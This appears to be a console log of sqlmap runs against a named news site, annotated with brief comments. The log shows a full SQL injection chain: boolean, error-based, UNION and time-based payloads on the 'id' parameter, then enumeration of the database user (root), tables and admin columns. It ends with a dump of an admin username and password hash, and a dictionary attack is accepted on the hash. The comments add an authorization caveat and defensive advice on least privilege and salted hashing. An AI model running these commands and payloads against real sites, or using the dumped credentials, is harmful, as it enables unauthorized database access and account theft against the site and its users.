D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user   /* note: fetch the name of the current database user. The "0 HTTP(s) requests" reported below is because the injection points are resumed from the session file of an earlier run, not re-tested. Only run this against systems you are authorized to test. */

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'   /* note: the web application connects to MySQL as root, so any injection inherits full DBMS privileges; the application account should be a least-privilege user scoped to its own schema */
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db   /* note: fetch the name of the current database */

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost"   /* note: list the table names of the current database */

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0   /* note: list the column names of the admin table (the stray "users" token looks like a paste error in the command line; the run completed regardless) */

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0   /* note: dump the contents of the selected columns. admin.password is a varchar(32) and sqlmap flags the dumped value as a possible password hash, which is consistent with an unsalted 32-hex-digit digest (confirm before assuming); a slow, salted scheme such as bcrypt or Argon2 would blunt the dictionary attack sqlmap offers below, and the table shows no cracked plaintext for this run. */

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>